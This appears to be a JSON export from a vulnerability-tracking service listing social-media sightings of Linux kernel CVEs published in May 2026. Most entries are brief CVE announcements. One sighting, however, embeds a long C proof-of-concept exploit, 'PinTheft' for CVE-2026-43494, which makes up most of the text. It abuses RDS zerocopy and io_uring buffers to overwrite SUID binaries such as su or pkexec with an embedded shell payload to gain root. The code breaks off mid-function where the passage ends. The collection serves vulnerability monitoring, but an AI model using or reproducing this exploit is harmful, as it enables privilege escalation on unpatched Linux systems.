{"vulnerability": "cve-2026-4349", "sightings": [{"uuid": "bc96d369-8733-40f5-b137-05c9ccb30669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43492", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mm7fua4css2n", "content": "CVE-2026-43492 - lib/crypto: mpi: Fix integer underflow in mpi_read_raw_from_sgl()\nCVE ID : CVE-2026-43492\n \n Published : May 19, 2026, 10:44 a.m. | 1\u00a0hour, 29\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nlib/crypto: mpi: Fi...", "creation_timestamp": "2026-05-19T12:38:23.318754Z"}, {"uuid": "038ba432-f814-4c2c-829c-f28d2dde5041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mm7g7vuom52t", "content": "CVE-2026-43493 - crypto: pcrypt - Fix handling of MAY_BACKLOG requests\nCVE ID : CVE-2026-43493\n \n Published : May 19, 2026, 10:44 a.m. | 1\u00a0hour, 29\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: pcrypt - Fix handling o...", "creation_timestamp": "2026-05-19T12:44:55.006948Z"}, {"uuid": "803287cd-8a3c-442e-a759-92ecba624338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mm7gkp7sn32c", "content": "CVE-2026-43491 - net: qrtr: ns: Limit the maximum server registration per node\nCVE ID : CVE-2026-43491\n \n Published : May 19, 2026, 10:44 a.m. | 1\u00a0hour, 29\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qrtr: ns: Limit th...", "creation_timestamp": "2026-05-19T12:50:57.211490Z"}, {"uuid": "868078f1-1fad-40a2-9055-b9104d0214fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmehrqrwq72k", "content": "CVE-2026-43494 - net/rds: reset op_nents when zerocopy page pin fails\nCVE ID : CVE-2026-43494\n \n Published : May 21, 2026, 10:49 a.m. | 1\u00a0hour, 28\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nnet/rds: reset op_nents when zer...", "creation_timestamp": "2026-05-21T12:56:06.973107Z"}, {"uuid": "2ed98e30-7353-42de-8ae0-7e74402c729d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43495", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmerpmotx72i", "content": "CVE-2026-43495 - net: wwan: t7xx: validate port_count against message length in t7xx_port_enum_msg_handler\nCVE ID : CVE-2026-43495\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:...", "creation_timestamp": "2026-05-21T15:53:52.211288Z"}, {"uuid": "1ca3fc88-83e6-41ef-9ff6-e9a5c3d7438b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmerscvff72i", "content": "CVE-2026-43499 - rtmutex: Use waiter::task instead of current in remove_waiter()\nCVE ID : CVE-2026-43499\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nrtmutex: Use waiter::tas...", "creation_timestamp": "2026-05-21T15:55:22.604213Z"}, {"uuid": "243dc70f-c5cf-4529-a00a-1166639d9cb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43498", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmescc66og2q", "content": "CVE-2026-43498 - accel/ivpu: Disallow re-exporting imported GEM objects\nCVE ID : CVE-2026-43498\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\naccel/ivpu: Disallow re-exporting...", "creation_timestamp": "2026-05-21T16:04:18.533821Z"}, {"uuid": "a20f18e1-c4cc-4488-b1d8-c274fd12faf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43497", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmesyzrc762t", "content": "CVE-2026-43497 - fbdev: udlfb: add vm_ops to dlfb_ops_mmap to prevent use-after-free\nCVE ID : CVE-2026-43497\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: udlfb: add vm...", "creation_timestamp": "2026-05-21T16:17:01.577996Z"}, {"uuid": "78d9d595-b529-4fbb-bab6-5ae321ca8657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43496", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmetnfmrzt2k", "content": "CVE-2026-43496 - net/sched: sch_red: Replace direct dequeue call with peek and qdisc_dequeue_peeked\nCVE ID : CVE-2026-43496\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nnet/s...", "creation_timestamp": "2026-05-21T16:28:25.209780Z"}, {"uuid": "41ce93e6-7cae-4846-829c-bc82a64f8ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43498", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116614473444295314", "content": "A severe vulnerability was disclosed for Linux Kernel (CVE-2026-43498) https://vuldb.com/vuln/365013", "creation_timestamp": "2026-05-21T20:34:12.583503Z"}, {"uuid": "0e5492f1-db9a-4e20-ae68-42532e1c8eed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43495", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116616573200856013", "content": "A lot of offensive activities were identified targeting Linux Kernel (CVE-2026-43495) https://vuldb.com/vuln/365011/cti", "creation_timestamp": "2026-05-22T05:29:42.029043Z"}, {"uuid": "4cb8320d-12c2-4c5d-ab91-39cb61f1705d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43498", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116617023069726248", "content": "Attention, elevated activities detected targeting Linux Kernel (CVE-2026-43498) https://vuldb.com/vuln/365013/cti", "creation_timestamp": "2026-05-22T07:22:36.618917Z"}, {"uuid": "da1191aa-2f98-4bb1-bf2b-2aeb092fd4a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmgiweecrly2", "content": "Daniel Baumann: Debian: Linux Vulnerability Mitigation (PinTheft) Following the series of various Linux exploits of the last three weeks, the bug of today is PinTheft [ CVE-2026-43494 ] which is lo...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-22T08:21:59.412601Z"}, {"uuid": "6a6b3389-468d-4fbc-b2db-87c6ad0fbb78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43490", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyri3mmq2x", "content": "\ud83d\udd17 CVE : CVE-2026-31499, CVE-2026-43088, CVE-2026-43109, CVE-2026-43220, CVE-2026-43490, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:30.840313Z"}, {"uuid": "472f092d-e4e3-42e1-9c07-647ba7be922b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://t.me/GithubRedTeam/85794", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43494-PinTheft-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jayhutajulu1\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-25 07:56:45\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nProof-of-concept for CVE-2026-43494 (PinTheft): Linux LPE via RDS zerocopy refcount bug + io_uring fixed buffers \u2192 SUID page-cache overwrite. Authorized research only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-25T08:00:04.000000Z"}, {"uuid": "e5e6c6e3-5059-42db-aad7-7836ed1cd533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "Telegram/-Rw1GdqgLbdPMkOwlVEIvz70NMtSIs0WWvrIrO5vIfavaPE", "content": "", "creation_timestamp": "2026-05-25T11:00:08.000000Z"}, {"uuid": "ab5f2ec0-a6c4-419c-9ac8-288bcb5c2432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://gist.github.com/spynika/bd10e4ce05b02731dc6266b8ce21160b", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef IORING_REGISTER_CLONE_BUFFERS\n#define IORING_REGISTER_CLONE_BUFFERS 19\n#endif\n\nstruct io_uring_clone_buffers {\n __u32 src_fd;\n __u32 flags;\n __u32 src_off;\n __u32 dst_off;\n __u32 nr;\n __u32 pad[3];\n};\n\n#define PAGE_SIZE 4096\n#define GUP_PIN_COUNTING_BIAS 1024\n#define PORT_BASE 20000\n#define MAX_RETRIES 5\n\nstatic const uint8_t SHELL_ELF[129] = {\n 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x03,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x38,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,\n 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0xb0,0x69,0x0f,0x05,0x48,0x8d,\n 0x3d,0xdb,0xff,0xff,0xff,0x6a,0x00,0x57,0x48,0x89,0xe6,0x31,0xd2,0xb0,0x3b,0x0f,\n 0x05,\n};\n\nstatic const char *suid_candidates[] = {\n \"/usr/bin/su\", \"/bin/su\", \"/usr/bin/mount\", \"/usr/bin/passwd\",\n \"/usr/bin/chsh\", \"/usr/bin/newgrp\", \"/usr/bin/umount\", \"/usr/bin/pkexec\", NULL\n};\n\n#define ANSI_RESET \"\\033[0m\"\n#define ANSI_DIM \"\\033[2m\"\n#define ANSI_BOLD \"\\033[1m\"\n#define ANSI_RED \"\\033[38;5;196m\"\n#define ANSI_GREEN \"\\033[38;5;46m\"\n#define ANSI_CYAN \"\\033[38;5;51m\"\n#define ANSI_YELLOW \"\\033[38;5;226m\"\n#define ANSI_MAGENTA \"\\033[38;5;201m\"\n#define ANSI_ORANGE \"\\033[38;5;208m\"\n#define ANSI_WHITE \"\\033[38;5;255m\"\n#define ANSI_GRAY \"\\033[38;5;245m\"\n#define ANSI_PURPLE \"\\033[38;5;99m\"\n\n#define LOG(fmt, ...) ui_log(fmt, ##__VA_ARGS__)\n#define ERR(fmt, ...) ui_err(fmt, ##__VA_ARGS__)\n#define OK(fmt, ...) ui_ok(fmt, ##__VA_ARGS__)\n\nstatic int g_phase = 0;\n\nstatic void ui_line(void) {\n fprintf(stderr,\n ANSI_GRAY \" \u2570\" ANSI_PURPLE \"\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\" ANSI_RESET \"\\n\");\n}\n\nstatic void ui_banner(void) {\n fprintf(stderr, \"\\n\");\n fprintf(stderr, ANSI_MAGENTA\n \" \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\\n\"\n \" \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\\n\"\n \" \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2557 \u255a\u2588\u2588\u2588\u2588\u2554\u255d \\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2588\u2588\u2554\u255d \\n\"\n \" \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \\n\"\n ANSI_RESET);\n fprintf(stderr,\n ANSI_PURPLE \" \u250c\u2500\" ANSI_RESET\n ANSI_BOLD ANSI_WHITE \" PinTheft \" ANSI_RESET\n ANSI_DIM \"\u00b7\" ANSI_RESET \" \"\n ANSI_CYAN \"CVE-2026-43494\" ANSI_RESET\n ANSI_PURPLE \" \u2500 io_uring GUP pin theft \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n\"\n ANSI_RESET);\n fprintf(stderr,\n ANSI_PURPLE \" \u2502\" ANSI_RESET \" \"\n ANSI_GRAY \"kernel local privilege escalation PoC\" ANSI_RESET\n \" \"\n ANSI_PURPLE \"\u2502\\n\"\n ANSI_RESET);\n fprintf(stderr,\n ANSI_PURPLE \" \u2514\" ANSI_GRAY \"\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\" ANSI_RESET\n ANSI_PURPLE \"\u2518\\n\\n\"\n ANSI_RESET);\n}\n\nstatic void ui_phase(const char *title) {\n g_phase++;\n fprintf(stderr, \"\\n\");\n fprintf(stderr,\n ANSI_ORANGE \" \u25b6 \" ANSI_BOLD \"PHASE %d\" ANSI_RESET\n ANSI_GRAY \" \u2502 \" ANSI_RESET\n ANSI_WHITE \"%s\" ANSI_RESET \"\\n\",\n g_phase, title);\n ui_line();\n}\n\nstatic void ui_log(const char *fmt, ...) {\n va_list ap;\n fprintf(stderr, ANSI_CYAN \" \u25c7 \" ANSI_RESET);\n va_start(ap, fmt);\n vfprintf(stderr, fmt, ap);\n va_end(ap);\n fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_ok(const char *fmt, ...) {\n va_list ap;\n fprintf(stderr, ANSI_GREEN \" \u2713 \" ANSI_RESET);\n va_start(ap, fmt);\n vfprintf(stderr, fmt, ap);\n va_end(ap);\n fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_err(const char *fmt, ...) {\n va_list ap;\n fprintf(stderr, ANSI_RED \" \u2717 \" ANSI_RESET);\n va_start(ap, fmt);\n vfprintf(stderr, fmt, ap);\n va_end(ap);\n fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_progress(int cur, int total) {\n const int width = 32;\n int filled = total ? (cur * width) / total : 0;\n if (filled > width) filled = width;\n\n fprintf(stderr, \"\\r\" ANSI_GRAY \" \u2502 \" ANSI_RESET);\n fprintf(stderr, ANSI_PURPLE \"[\");\n for (int i = 0; i < width; i++)\n fprintf(stderr, i < filled ? ANSI_MAGENTA \"\u2588\" : ANSI_GRAY \"\u2591\");\n fprintf(stderr, ANSI_PURPLE \"]\" ANSI_RESET);\n fprintf(stderr, \" \" ANSI_WHITE \"%3d%%\" ANSI_RESET, total ? (cur * 100) / total : 0);\n fprintf(stderr, ANSI_GRAY \" (%d/%d)\" ANSI_RESET, cur, total);\n if (cur >= total)\n fprintf(stderr, \"\\n\");\n fflush(stderr);\n}\n\nstatic void ui_stat_box(const char *label, const char *value, const char *color) {\n fprintf(stderr,\n ANSI_PURPLE \" \u2502 \" ANSI_RESET\n \"%-18s\" ANSI_GRAY \" \u2192 \" ANSI_RESET\n \"%s%s%s\\n\",\n label, color, value, ANSI_RESET);\n}\n\nstatic void ui_footer(int success) {\n fprintf(stderr, \"\\n\");\n if (success) {\n fprintf(stderr,\n ANSI_GREEN\n \" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\"\n \" \u2551 \" ANSI_BOLD \"CHAIN COMPLETE\" ANSI_RESET ANSI_GREEN\n \" \u00b7 spawning privileged context... \u2551\\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\"\n ANSI_RESET);\n } else {\n fprintf(stderr,\n ANSI_RED\n \" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\"\n \" \u2551 \" ANSI_BOLD \"ABORTED\" ANSI_RESET ANSI_RED\n \" \u00b7 exploit chain did not finish \u2551\\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\"\n ANSI_RESET);\n }\n}\n\nstatic void pin_cpu(int cpu) {\n cpu_set_t set;\n CPU_ZERO(&set);\n CPU_SET(cpu, &set);\n if (sched_setaffinity(0, sizeof(set), &set) < 0) {\n ERR(\"sched_setaffinity: %s\", strerror(errno));\n exit(1);\n }\n}\n\nstatic const char *find_suid_target(void) {\n for (int i = 0; suid_candidates[i]; i++) {\n struct stat st;\n if (stat(suid_candidates[i], &st) == 0 && (st.st_mode & S_ISUID)) {\n OK(\"Found SUID: %s\", suid_candidates[i]);\n return suid_candidates[i];\n }\n }\n return NULL;\n}\n\nstatic int backup_target(const char *path) {\n const char *name = strrchr(path, '/');\n name = name ? name + 1 : path;\n char backup[256];\n snprintf(backup, sizeof(backup), \"/tmp/.backup_%s_%d\", name, getpid());\n LOG(\"Backing up %s \u2192 %s\", path, backup);\n\n int src = open(path, O_RDONLY);\n if (src < 0) {\n ERR(\"open src: %s\", strerror(errno));\n return -1;\n }\n int dst = open(backup, O_WRONLY | O_CREAT | O_TRUNC, 0755);\n if (dst < 0) {\n ERR(\"open dst: %s\", strerror(errno));\n close(src);\n return -1;\n }\n\n char tmp[4096];\n ssize_t n;\n while ((n = read(src, tmp, sizeof(tmp))) > 0) {\n if (write(dst, tmp, n) != n) {\n ERR(\"write backup: %s\", strerror(errno));\n close(src);\n close(dst);\n return -1;\n }\n }\n close(src);\n close(dst);\n OK(\"Backup: %s\", backup);\n return 0;\n}\n\nstatic int steal_one_ref(void *page_addr, int port) {\n int fd = socket(AF_RDS, SOCK_SEQPACKET, 0);\n if (fd < 0) return -1;\n\n int v = 1;\n setsockopt(fd, SOL_SOCKET, SO_ZEROCOPY, &v, sizeof(v));\n int sndbuf = 2 * 4096 * 4;\n setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf));\n v = 2;\n setsockopt(fd, SOL_RDS, SO_RDS_TRANSPORT, &v, sizeof(v));\n\n struct sockaddr_in a = {\n .sin_family = AF_INET,\n .sin_addr.s_addr = htonl(INADDR_LOOPBACK),\n .sin_port = htons(port),\n };\n if (bind(fd, (struct sockaddr *)&a, sizeof(a)) < 0) {\n close(fd);\n return -1;\n }\n\n a.sin_port = htons(port + 1);\n struct iovec iov = { page_addr, 2 * PAGE_SIZE };\n\n char cb[CMSG_SPACE(sizeof(uint32_t))];\n memset(cb, 0, sizeof(cb));\n struct cmsghdr *cm = (struct cmsghdr *)cb;\n cm->cmsg_level = SOL_RDS;\n cm->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;\n cm->cmsg_len = CMSG_LEN(sizeof(uint32_t));\n\n struct msghdr m = {\n .msg_name = &a,\n .msg_namelen = sizeof(a),\n .msg_iov = &iov,\n .msg_iovlen = 1,\n .msg_control = cb,\n .msg_controllen = sizeof(cb),\n };\n sendmsg(fd, &m, MSG_ZEROCOPY | MSG_DONTWAIT);\n close(fd);\n return 0;\n}\n\nstruct uring {\n int fd;\n void *sq_ring, *cq_ring;\n struct io_uring_sqe *sqes;\n uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array;\n uint32_t *cq_head, *cq_tail, *cq_mask;\n struct io_uring_cqe *cqes;\n size_t sq_ring_sz, cq_ring_sz, sqes_sz;\n};\n\nstatic int uring_setup(struct uring *r, unsigned entries) {\n struct io_uring_params p;\n memset(&p, 0, sizeof(p));\n\n r->fd = syscall(__NR_io_uring_setup, entries, &p);\n if (r->fd < 0) {\n ERR(\"io_uring_setup: %s\", strerror(errno));\n return -1;\n }\n\n r->sq_ring_sz = p.sq_off.array + p.sq_entries * sizeof(uint32_t);\n r->cq_ring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);\n r->sqes_sz = p.sq_entries * sizeof(struct io_uring_sqe);\n\n r->sq_ring = mmap(NULL, r->sq_ring_sz, PROT_READ | PROT_WRITE,\n MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_SQ_RING);\n if (r->sq_ring == MAP_FAILED) {\n ERR(\"mmap sq_ring: %s\", strerror(errno));\n return -1;\n }\n\n r->cq_ring = mmap(NULL, r->cq_ring_sz, PROT_READ | PROT_WRITE,\n MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_CQ_RING);\n if (r->cq_ring == MAP_FAILED) {\n ERR(\"mmap cq_ring: %s\", strerror(errno));\n return -1;\n }\n\n r->sqes = mmap(NULL, r->sqes_sz, PROT_READ | PROT_WRITE,\n MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_SQES);\n if (r->sqes == MAP_FAILED) {\n ERR(\"mmap sqes: %s\", strerror(errno));\n return -1;\n }\n\n r->sq_head = (uint32_t *)((char *)r->sq_ring + p.sq_off.head);\n r->sq_tail = (uint32_t *)((char *)r->sq_ring + p.sq_off.tail);\n r->sq_mask = (uint32_t *)((char *)r->sq_ring + p.sq_off.ring_mask);\n r->sq_array = (uint32_t *)((char *)r->sq_ring + p.sq_off.array);\n r->cq_head = (uint32_t *)((char *)r->cq_ring + p.cq_off.head);\n r->cq_tail = (uint32_t *)((char *)r->cq_ring + p.cq_off.tail);\n r->cq_mask = (uint32_t *)((char *)r->cq_ring + p.cq_off.ring_mask);\n r->cqes = (struct io_uring_cqe *)((char *)r->cq_ring + p.cq_off.cqes);\n return 0;\n}\n\nstatic int uring_register_buffers(struct uring *r, void *buf, size_t len) {\n struct iovec iov = { .iov_base = buf, .iov_len = len };\n int ret = syscall(__NR_io_uring_register, r->fd,\n IORING_REGISTER_BUFFERS, &iov, 1);\n if (ret < 0) {\n ERR(\"io_uring_register buffers: %s\", strerror(errno));\n return -1;\n }\n return 0;\n}\n\nstatic int uring_clone_buffers(struct uring *dst, struct uring *src) {\n struct io_uring_clone_buffers arg;\n memset(&arg, 0, sizeof(arg));\n arg.src_fd = src->fd;\n int ret = syscall(__NR_io_uring_register, dst->fd,\n IORING_REGISTER_CLONE_BUFFERS, &arg, 1);\n if (ret < 0) {\n ERR(\"io_uring_clone_buffers: %s\", strerror(errno));\n return -1;\n }\n return 0;\n}\n\nstatic pid_t spawn_ring_holder(int ring2_fd) {\n pid_t pid = fork();\n if (pid != 0) return pid;\n fcntl(ring2_fd, F_SETFD, 0);\n for (int fd = 0; fd < 1024; fd++)\n if (fd != ring2_fd) close(fd);\n open(\"/dev/null\", O_RDONLY);\n open(\"/dev/null\", O_WRONLY);\n open(\"/dev/null\", O_WRONLY);\n execl(\"/bin/sleep\", \"sleep\", \"99999\", (char *)NULL);\n _exit(0);\n}\n\nstatic int uring_submit_read_fixed(struct uring *r, int file_fd, void *buf, uint32_t len) {\n uint32_t tail = *r->sq_tail;\n uint32_t idx = tail & *r->sq_mask;\n\n struct io_uring_sqe *sqe = &r->sqes[idx];\n memset(sqe, 0, sizeof(*sqe));\n sqe->opcode = IORING_OP_READ_FIXED;\n sqe->fd = file_fd;\n sqe->off = 0;\n sqe->addr = (uint64_t)(unsigned long)buf;\n sqe->len = len;\n sqe->buf_index = 0;\n\n r->sq_array[idx] = idx;\n __atomic_store_n(r->sq_tail, tail + 1, __ATOMIC_RELEASE);\n\n int ret = syscall(__NR_io_uring_enter, r->fd, 1, 1,\n IORING_ENTER_GETEVENTS, NULL, 0);\n if (ret < 0) {\n ERR(\"io_uring_enter: %s\", strerror(errno));\n return -1;\n }\n return 0;\n}\n\nstatic int uring_wait_cqe(struct uring *r, int32_t *res_out) {\n uint32_t head = 